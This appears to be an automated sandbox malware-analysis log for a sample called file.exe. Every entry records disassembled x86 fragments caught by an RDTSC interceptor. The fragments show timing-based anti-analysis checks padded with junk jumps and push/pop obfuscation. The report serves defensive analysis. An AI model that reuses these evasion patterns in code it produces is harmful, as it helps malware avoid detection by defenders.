                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D722E2 second address: D72334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA6h 0x00000007 jmp 00007F1770B77E9Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jo 00007F1770B77E96h 0x00000015 jmp 00007F1770B77EA5h 0x0000001a jmp 00007F1770B77E9Ch 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72334 second address: D72351 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1770F379FEh 0x00000008 push ebx 0x00000009 jmp 00007F1770F379FAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D252A3 second address: D252A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D252A7 second address: D252BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A04h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D252BF second address: D252CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D252CB second address: D252CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D252CF second address: D252D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7627D second address: D76281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76281 second address: D76296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F1770B77E96h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46A94 second address: D46A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46B98 second address: D46B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46E53 second address: D46E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46E58 second address: B91ABF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F1770B77E96h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dx, ax 0x00000012 push dword ptr [ebp+122D16FDh] 0x00000018 mov edi, eax 0x0000001a call dword ptr [ebp+122D1D18h] 0x00000020 pushad 0x00000021 pushad 0x00000022 sub dword ptr [ebp+122D3A0Eh], eax 0x00000028 movsx edi, ax 0x0000002b popad 0x0000002c xor eax, eax 0x0000002e xor dword ptr [ebp+122D3A0Eh], esi 0x00000034 mov dword ptr [ebp+122D3A0Eh], ecx 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e add dword ptr [ebp+122D3A0Eh], ebx 0x00000044 mov dword ptr [ebp+122D29EAh], eax 0x0000004a jmp 00007F1770B77EA3h 0x0000004f mov esi, 0000003Ch 0x00000054 stc 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 mov dword ptr [ebp+122D23CAh], esi 0x0000005f lodsw 0x00000061 mov dword ptr [ebp+122D1848h], edi 0x00000067 add dword ptr [ebp+122D23CAh], esi 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 cmc 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 mov bl, dh 0x00000079 mov si, bx 0x0000007c popad 0x0000007d nop 0x0000007e push edi 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007F1770B77E9Dh 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FA4 second address: D46FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1770F379FEh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jng 00007F1770F379F8h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1770F379FDh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FD2 second address: D46FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FE1 second address: D47016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jno 00007F1770F379F8h 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 jmp 00007F1770F37A05h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F1770F379F8h 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47016 second address: D470C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F1770B77E98h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 movzx edx, dx 0x00000027 mov dh, al 0x00000029 call 00007F1770B77E99h 0x0000002e jmp 00007F1770B77EA2h 0x00000033 push eax 0x00000034 jnp 00007F1770B77E9Ch 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e jne 00007F1770B77EA8h 0x00000044 mov eax, dword ptr [eax] 0x00000046 jmp 00007F1770B77EA8h 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jnl 00007F1770B77E96h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47253 second address: D47259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D473F6 second address: D473FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47546 second address: D4754A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4754A second address: D47554 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47CDB second address: D47D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F1770F379FBh 0x0000000b pop ecx 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F1770F379F8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a lea eax, dword ptr [ebp+12488758h] 0x00000030 mov dword ptr [ebp+122D1BA2h], edx 0x00000036 nop 0x00000037 pushad 0x00000038 push ecx 0x00000039 pushad 0x0000003a popad 0x0000003b pop ecx 0x0000003c jmp 00007F1770F37A07h 0x00000041 popad 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jns 00007F1770F379F8h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7686F second address: D76879 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1770B77E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76E07 second address: D76E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8064C second address: D80666 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jc 00007F1770B77E96h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F57D second address: D7F581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F89A second address: D7F8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F1770B77E9Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F1770B77E96h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F8B7 second address: D7F8D1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1770F379F6h 0x00000008 jno 00007F1770F379F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F1770F379F6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F8D1 second address: D7F8D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F8D5 second address: D7F8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1770F379FEh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F8EF second address: D7F92A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1770B77E9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1770B77E9Fh 0x00000015 jnp 00007F1770B77E96h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FA5C second address: D7FA62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FD88 second address: D7FDA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F1770B77EA7h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FDA5 second address: D7FDA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEDF second address: D7FEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F1770B77E9Bh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEEF second address: D7FEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEF5 second address: D7FEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1770B77E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEFF second address: D7FF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF03 second address: D7FF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770B77EA1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF1E second address: D7FF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF24 second address: D7FF3B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1770B77E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jbe 00007F1770B77E96h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF3B second address: D7FF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF3F second address: D7FF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F1770B77E9Eh 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF56 second address: D7FF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D877A8 second address: D877AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87450 second address: D87478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770F379FDh 0x00000009 pop edx 0x0000000a jmp 00007F1770F37A01h 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87478 second address: D87484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1770B77E96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87484 second address: D874B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F1770F37A02h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1770F37A00h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B36C second address: D8B375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC8B5 second address: CFC8B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AFD0 second address: D8AFD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AFD6 second address: D8AFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1770F379F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AFE0 second address: D8AFE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9283C second address: D92848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D476B2 second address: D47734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jnc 00007F1770B77E96h 0x0000000c pop edi 0x0000000d popad 0x0000000e nop 0x0000000f call 00007F1770B77E9Eh 0x00000014 jne 00007F1770B77E9Ch 0x0000001a pop edi 0x0000001b mov ebx, dword ptr [ebp+12488753h] 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F1770B77E98h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 00000016h 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b xor dword ptr [ebp+12454FBEh], eax 0x00000041 add eax, ebx 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007F1770B77E98h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 0000001Bh 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d mov cx, di 0x00000060 nop 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47734 second address: D477B9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F1770F379F8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push ebx 0x00000016 jmp 00007F1770F37A02h 0x0000001b pop ebx 0x0000001c pushad 0x0000001d jmp 00007F1770F37A03h 0x00000022 jnl 00007F1770F379F6h 0x00000028 popad 0x00000029 popad 0x0000002a nop 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F1770F379F8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D3A06h], ecx 0x0000004b mov ecx, dword ptr [ebp+122D2BFAh] 0x00000051 push 00000004h 0x00000053 stc 0x00000054 nop 0x00000055 jng 00007F1770F37A00h 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D924F8 second address: D92500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9512E second address: D95140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F1770F379FAh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D952C0 second address: D952C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95594 second address: D95598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95598 second address: D9559E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9559E second address: D955A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D955A3 second address: D955B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770B77E9Ah 0x00000009 pop ecx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED620 second address: CED626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98DAB second address: D98DB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98DB2 second address: D98DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98F30 second address: D98F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98F36 second address: D98F86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F379FBh 0x00000007 jmp 00007F1770F37A02h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1770F37A07h 0x00000015 jmp 00007F1770F37A06h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98F86 second address: D98F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770B77E9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D990E7 second address: D990EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA17AD second address: DA17BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F1770B77E96h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA17BF second address: DA17D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770F379FCh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA17D0 second address: DA17DA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1770B77E9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA17DA second address: DA17FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1770F37A00h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F1770F379F6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA17FE second address: DA180A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F1770B77E96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA180A second address: DA1824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A04h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F92E second address: D9F932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F932 second address: D9F93C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1770F379F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FAAB second address: D9FAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FAAF second address: D9FAB9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1770F379F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FAB9 second address: D9FAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F1770B77EA5h 0x0000000c jmp 00007F1770B77E9Fh 0x00000011 pop edi 0x00000012 jc 00007F1770B77EACh 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F1770B77E96h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FC13 second address: D9FC17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FC17 second address: D9FC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jng 00007F1770B77E96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FC27 second address: D9FC2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FC2D second address: D9FC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA06ED second address: DA06F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1770F379F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
